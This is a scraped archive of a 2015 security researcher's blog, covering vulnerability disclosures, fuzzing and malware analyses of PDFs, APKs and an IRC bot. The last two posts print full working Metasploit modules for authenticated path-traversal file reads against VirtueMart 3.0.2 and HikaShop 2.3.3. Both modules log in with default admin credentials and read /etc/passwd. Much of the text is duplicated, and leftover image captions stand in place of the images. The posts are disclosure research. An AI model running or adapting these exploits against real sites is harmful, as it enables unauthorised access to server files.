(I wrote this as a 'note' in 14.12.2015 but in case that all information are already public,
below you will find proof of concept and little write-up for vulnerability described in this CVE.)
Sunday, 27 December 2015
Saturday, 26 December 2015
New version of Lime Survey
As far as I know LimeSurvey is already updated, so below you will find all described vulnerabilities I found nearly 2 months ago during some small 'code review' exercises.
Response from LimeSurvey Team was very fast! :)
Found: 4.11.2015
Sent: 5.11.2015
Resp: 5.11.2015
AFAIK all findings were fixed in 48h. So... here we go:
Response from LimeSurvey Team was very fast! :)
Found: 4.11.2015
Sent: 5.11.2015
Resp: 5.11.2015
AFAIK all findings were fixed in 48h. So... here we go:
Saturday, 24 October 2015
[EN] SOAP testing
During one of last projects I needed to test some webservices.
I was wondering: if I can do it with Burp or by manual testing,
maybe I can also write some quick code in python...
And that's how I wrote soapee.py:
I was wondering: if I can do it with Burp or by manual testing,
maybe I can also write some quick code in python...
And that's how I wrote soapee.py:
Friday, 2 October 2015
My Java SIGSEGV's
During
couple of last days I was checking lcamtuf’s American Fuzzy Lop against
some (“non-instrumented”) binaries.
I was
looking for some sources, but unfortunately I wasn’t able to find any. Next
thing was checking where I have Java installed (so I will know what/where I can
check. Kind of ‘test lab’ was: Ubuntu 12, Kali Linux, WinXP, Win7. (Exact version
of Java installed on that OS’s you will find below.)
Friday, 19 June 2015
[EN] Social engineering attacks during conference in Katowice
Thanks for watching and all questions during this conference ;)
It was a great energy!
More details: http://www.tuv-nord.com/pl/pl/aktualnosci-436-1921.htm
See you next time.
o/
It was a great energy!
More details: http://www.tuv-nord.com/pl/pl/aktualnosci-436-1921.htm
See you next time.
o/
Wednesday, 27 May 2015
SQLI in e107 CMS
During last few weeks in the middle of time I was doing also some source code review.
That's how I found sqli bug in admin panel in e107 CMS. After a fast response from e107 Team,
fix was created.
This bug was found in e107_2.0_full_beta1 version. I don't know if other versions are also vulnerable.
Details about the vulnerability (even when it's in admin panel) will not be published for now.
Stay in touch. ;)
That's how I found sqli bug in admin panel in e107 CMS. After a fast response from e107 Team,
fix was created.
This bug was found in e107_2.0_full_beta1 version. I don't know if other versions are also vulnerable.
Details about the vulnerability (even when it's in admin panel) will not be published for now.
Stay in touch. ;)
Monday, 25 May 2015
[EN] Browser exploitation during CybercomDev conference - Updated
During this weekend I gave my first formal security presentation at CybercomDev in Poland.
I was talking about use-after-free exploits, fuzzing and browser exploitation.
Thank you for watching and support ;)
* Currently this presentation is available only on demand.
* Update - 16.07.2015 *
Video (PL) is available here. Thank's Kenis. ;)
See you next time! ;)
o/
I was talking about use-after-free exploits, fuzzing and browser exploitation.
Thank you for watching and support ;)
* Currently this presentation is available only on demand.
* Update - 16.07.2015 *
Video (PL) is available here. Thank's Kenis. ;)
See you next time! ;)
o/
Tuesday, 28 April 2015
[EN] Flex 2.5.33 (2) 0days
I was testing some old bugs in one old distro, and that's how I found sigsegv in flex (2.5.33).
Below is the proof of concept:
Below is the proof of concept:
Monday, 2 March 2015
[EN] Analysing malicious PDF - part 2
This time we will check 2 PDF's (because I decide that it will be more fun than just posting about one ;)). Beside that - those 2 files contains different method for delivering the payload, so we will check all of them.
Sunday, 1 March 2015
[EN] Analyzing Malicious PDF
Reading Contagio Blog I found few examples of malicious PDF files.
Today we will check one of them. :)
During PDF analysis many times we will use peepdf and Malzilla.
Also this time, those tool will help us to understand what's going on with
our PDF file.
Let's run peepdf on this file. As we can see there is some JavaScript object.
Let's examine this by "object 7" command:
Today we will check one of them. :)
During PDF analysis many times we will use peepdf and Malzilla.
Also this time, those tool will help us to understand what's going on with
our PDF file.
Let's run peepdf on this file. As we can see there is some JavaScript object.
Let's examine this by "object 7" command:
[EN] Obfuscated case - JSredirector
Today we'll check some "obfuscated" JavaScript code. I found this example (named
'JSredirector') on this site. Thanks again! ;)
So... Unzip the file and you will find index.html with JS code.
Index.html contains encoded JS code:
'JSredirector') on this site. Thanks again! ;)
So... Unzip the file and you will find index.html with JS code.
Index.html contains encoded JS code:
Tuesday, 24 February 2015
[EN] Malware analysis – Fake AV Downloader (part 1)
1. Thanks for the sample file(s)
After writing my last article about malware analysis for Android[1], I decide to check some threats that may come from webpages. Today we can see more advertisement on web than it was few years ago. In case of malicious pages, “advertisements” added there now, more often probably will try to steal your data by installing some malware on your computer or by redirecting you to webpage containing exploit code for your browser(‘s plugin).
Few nice examples of ‘webpages’ like this, I found (again) on great Mila’s blog[0]. Thank’s again! ;)
(Hint: Don’t ask me for the password. Ask Mila via email.)
After writing my last article about malware analysis for Android[1], I decide to check some threats that may come from webpages. Today we can see more advertisement on web than it was few years ago. In case of malicious pages, “advertisements” added there now, more often probably will try to steal your data by installing some malware on your computer or by redirecting you to webpage containing exploit code for your browser(‘s plugin).
Few nice examples of ‘webpages’ like this, I found (again) on great Mila’s blog[0]. Thank’s again! ;)
(Hint: Don’t ask me for the password. Ask Mila via email.)
[EN] Fun with American Fu(n)zzy Lop
Last days I was doing a little research about 'how this crazy afl works'. ;)
"American Fuzzy Lop" it's an excellent tool created by lcamtuf.
Now it's a good moment to check the documentation of 'afl' if you want
some nice details about using it.
"American Fuzzy Lop" it's an excellent tool created by lcamtuf.
Now it's a good moment to check the documentation of 'afl' if you want
some nice details about using it.
Wednesday, 28 January 2015
[PL] Analiza aplikacji atticlab.bodyscanner.apk
W
tym krótkim poście wyjaśnię sposób w jaki sprawdzałem co robi aplikacja
atticlab.bodyscanner.apk. Plik znalazłem przeglądając stronę http://contagiodump.blogspot.com/ [1]
- dzięki za próbki!
Spis treści:
Sunday, 18 January 2015
[EN] kmt.apk - what's this?
Few days ago I found application for android named 'kmt.apk'.
I was wondering, what this app is doing... To check it, I used apktool.
Listing of files showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:
After checking that this app needs my location (or location of my phone),
I was curious, where (all?) those data are going. This is what I found:
Another one:
And that's how I found this link :)
So it seems that this application is checking information about your localization on your
phone, and sending them to this "erotte" web. For now we're done here. ;)
If you will have some nice APK files to analyse, let me know via email. Thanks.
Cheers,
o/
I was wondering, what this app is doing... To check it, I used apktool.
Listing of files showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:
 |
| AndroidManifest.xml |
After checking that this app needs my location (or location of my phone),
I was curious, where (all?) those data are going. This is what I found:
 |
| jd-gui in action |
 |
| jd-gui in action - sending params... |
 |
| jd-gui in action - sending params... |
Another one:
 | |
| onCreate function |
And that's how I found this link :)
So it seems that this application is checking information about your localization on your
phone, and sending them to this "erotte" web. For now we're done here. ;)
If you will have some nice APK files to analyse, let me know via email. Thanks.
Cheers,
o/
[EN] Checking Illusion Bot
I was checking other stuff, and suddenly found "Illusion Bot". Seems to be a small IRC DDoS Bot. ;]
Let see...
Download:
Unzipped it looks like this:
I decide to check webfiles first... but I don't understand all of it... ;]
So I decide to use nice and friendly 'string' command. Connected with few grep's:
Of course in those PHP files (index.php and upgrade.php) you can find more things, like
how this backdoor is installing itself in the WWW server, or how it's sending commands, etc.
Base64 decoded files, now looks like this:
...and commands again:
Point of view from IDA:
And this is my favourite :D
More, maybe soon. ;)
Cheers,
o/
Let see...
Download:
 | |||||
| You can easily find it on the web |
Unzipped it looks like this:
 |
| Unzipped |
I decide to check webfiles first... but I don't understand all of it... ;]
 |
| Sorry - don't understand |
So I decide to use nice and friendly 'string' command. Connected with few grep's:
 |
| Commands to use for this bot |
how this backdoor is installing itself in the WWW server, or how it's sending commands, etc.
 |
| Bots tables |
...and commands again:
Point of view from IDA:
And this is my favourite :D
 |
| can you see it? ;) |
More, maybe soon. ;)
Cheers,
o/
Monday, 12 January 2015
[EN] VirtueMart 3 - LFI for Metasploit
Regarding to last few posts, below you can find another small poc exploit for LFI vulnerability found in latest (this time) VirtueMart (3.0.2).
Because it's for Joomla again, again it's based on HikaShop LFI poc.
Enjoy:
And the code:
---<virtuemart_auth_lfi.rb>---
root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
'Description' => %q{
VirtueMart 3.0.2 is vulnerable to local file include attack.
Authenticated user can read local files from the server.
More here: https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery
# MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
'http://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => ' 23.12.2014'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
], self.class)
end
def check
end
def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end
def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end
print_status("[+] Good: " + req1.code.to_s)
print_good("[+] Got cookie(s): " + cookies)
token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Got token: "+ token.to_s)
else
print_status("[-] Token not found")
end
# now we need to do auth using that token and cookies
print_status("[+] Trying to auth...")
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})
print_good("[+] Code after auth: " + auth.code.to_s)
# 3rd step: get + post params to lfi
print_good('[+] Exploit...')
readthis = "../../../../../../../../../../../../../../../../../../etc/passwd"
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_virtuemart',
'view' => 'log',
'task' => 'edit',
'logfile' => readthis
},
'cookie' => cookies
})
if xpl
print_good("[+] Exploit response code: " + xpl.code.to_s)
print_good("[+] Response body after attack:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit
end
---<virtuemart_auth_lfi.rb>---
Pastebin version is here.
Cheers,
o/
Because it's for Joomla again, again it's based on HikaShop LFI poc.
Enjoy:
 |
| Preparing to exploit... |
 |
| Raw results |
And the code:
---<virtuemart_auth_lfi.rb>---
root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
'Description' => %q{
VirtueMart 3.0.2 is vulnerable to local file include attack.
Authenticated user can read local files from the server.
More here: https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery
# MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
'http://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => ' 23.12.2014'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
], self.class)
end
def check
end
def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end
def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end
print_status("[+] Good: " + req1.code.to_s)
print_good("[+] Got cookie(s): " + cookies)
token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Got token: "+ token.to_s)
else
print_status("[-] Token not found")
end
# now we need to do auth using that token and cookies
print_status("[+] Trying to auth...")
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})
print_good("[+] Code after auth: " + auth.code.to_s)
# 3rd step: get + post params to lfi
print_good('[+] Exploit...')
readthis = "../../../../../../../../../../../../../../../../../../etc/passwd"
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_virtuemart',
'view' => 'log',
'task' => 'edit',
'logfile' => readthis
},
'cookie' => cookies
})
if xpl
print_good("[+] Exploit response code: " + xpl.code.to_s)
print_good("[+] Response body after attack:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit
end
---<virtuemart_auth_lfi.rb>---
Pastebin version is here.
Cheers,
o/
Saturday, 3 January 2015
[EN] HikaShop LFI - Metasploit module
Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.
Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.
Below you will find a dirty MSF poc for LFI vulnerability located in HikaShop 2.3.3. ;)
Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just check how I've done that before or feel free to contact me with any questions/suggestions.
Loading exploit:
Running:
... and finally we will get the content of /etc/passwd:
Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HikaShop - LFI poc for authenticated users',
'Description' => %q{
HikaShop 2.3.3 is vulnerable to local file include attack.
Authenticated user can read local files from the server.
Vulnerability was described on https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery / msf module
'http://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '03.01.2015'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
], self.class)
end
def check
end
def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end
def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end
print_status("[+] Resp code: " + req1.code.to_s)
print_good("[+] Cookie(s) : " + cookies)
token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Token : "+ token.to_s)
else
print_status("[-] Token not found")
end
# now we need to do auth using that token and cookies
print_status("[+] 2nd request (post with auth)")
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})
print_good("[+] Code after auth: " + auth.code.to_s)
# 3rd step: get + post params to lfi
print_status('[+] and now 3rd request...')
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_hikashop',
'ctrl' => 'view',
'task' => 'edit',
'id' => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
},
'cookie' => cookies
})
if xpl
print_good("[+] 3rd response code: " + xpl.code.to_s)
print_good("[+] 3rd (full) response body:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit
end
---<hikashop_auth_lfi.rb>---
And pastebin version is here.
Happy New Year! ;)
Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.
Below you will find a dirty MSF poc for LFI vulnerability located in HikaShop 2.3.3. ;)
Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just check how I've done that before or feel free to contact me with any questions/suggestions.
Loading exploit:
Running:
... and finally we will get the content of /etc/passwd:
Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HikaShop - LFI poc for authenticated users',
'Description' => %q{
HikaShop 2.3.3 is vulnerable to local file include attack.
Authenticated user can read local files from the server.
Vulnerability was described on https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery / msf module
'http://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '03.01.2015'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
], self.class)
end
def check
end
def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end
def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end
print_status("[+] Resp code: " + req1.code.to_s)
print_good("[+] Cookie(s) : " + cookies)
token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Token : "+ token.to_s)
else
print_status("[-] Token not found")
end
# now we need to do auth using that token and cookies
print_status("[+] 2nd request (post with auth)")
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})
print_good("[+] Code after auth: " + auth.code.to_s)
# 3rd step: get + post params to lfi
print_status('[+] and now 3rd request...')
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_hikashop',
'ctrl' => 'view',
'task' => 'edit',
'id' => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
},
'cookie' => cookies
})
if xpl
print_good("[+] 3rd response code: " + xpl.code.to_s)
print_good("[+] 3rd (full) response body:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit
end
---<hikashop_auth_lfi.rb>---
And pastebin version is here.
Happy New Year! ;)
Subscribe to:
Posts (Atom)